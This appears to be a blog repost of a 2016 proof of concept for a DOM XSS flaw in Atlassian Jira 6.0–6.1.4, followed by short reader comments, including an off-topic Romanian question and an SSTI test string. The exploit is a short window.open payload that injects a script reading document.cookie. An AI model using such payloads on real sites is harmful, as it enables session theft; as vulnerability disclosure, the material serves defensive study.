DOM XSS (Cross-Site Scripting) is a medium-critical vulnerability specific to web applications. This attack allows malicious scripts to be injected directly into a web page's Document Object Model (DOM), putting users at risk. Prompt identification and remediation of this vulnerability are essential to safeguarding a web application's integrity and security.
Proof of Concept
# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS # Date : 27.01.2016 # Author: Razvan Cernaianu # Vendor Homepage: https://www.atlassian.com # Version: 6.0.* <= 6.1.4 # Blog: www.TinKode.com
Vulnerable code
# Vulnerable Parameter: $window.name <div class="aui-page-header-main"> <h1>${name}</h1> </div>
Exploit
<html> <script> var victim= window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>'); </script> </html>
Nice
ReplyDeleteDar ce e asta?
ReplyDeletefrumos
ReplyDeleteFrumos
ReplyDeleteAm o problema si suna cam asa :
ReplyDeleteAcum cativa ani ani am creat un cont google , am uploadat o imagine cu mine , iar acum doresc sa o sterg.
Cum pot sterge acea imagine daca nu mai am acces la cont ?
Nu o poţi şterge dacă nu ai acces la cont.
DeleteGreat post, I don't know much programming but this seems interesting.
ReplyDeleteIT seems to be SSTI.... ${{9*9}}
ReplyDelete